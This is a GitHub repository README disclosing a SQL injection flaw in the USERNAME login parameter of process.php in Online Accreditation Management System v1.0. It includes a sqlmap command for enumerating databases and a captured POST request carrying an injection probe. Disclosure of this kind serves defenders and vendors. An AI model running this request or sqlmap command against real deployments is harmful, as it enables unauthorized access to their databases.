Skip to content

JackyG0/Online-Accreditation-Management-System-v1.0-SQLi

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits

README.md

README.md

 
 

png01.png

png01.png

 
 

png02.png

png02.png

 
 

png03.png

png03.png

 
 

poc 00_00_00-00_00_30.gif

poc 00_00_00-00_00_30.gif

 
 

poc.gif

poc.gif

 
 

poc.mp4

poc.mp4

 
 

Repository files navigation

Online-Accreditation-Management-System-v1.0-SQLi

Online Accreditation Management System v1.0 - SQLi

Vendor

image-20220527131251530

Description:

The vulnerability page is process.php

http://your-ip/AccreditationSystem/

Online Accreditation Management System v1.0

The USERNAME parameter in the process.php page appears to be vulnerable to SQL injection attacks.

[+]sqlmap:

Save the POST request package in 1.txt, and then run the sqlmap

python sqlmap.py -r 1.txt --dbs

[+]POST request package

POST /AccreditationSystem/process.php?action=loginagency HTTP/1.1
Host: 10.211.55.3
Content-Length: 40
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.211.55.3
Referer: http://10.211.55.3/AccreditationSystem/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=kc1vvdqjtt94b9i5461cf4s5r2
Connection: close

USERNAME=ff%E9%8E%88%27%22%5C%28&PASS=ff

In action:

image-20220527130708845

image-20220527131145577

Proof and Exploit:

image-123

watch the video here

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published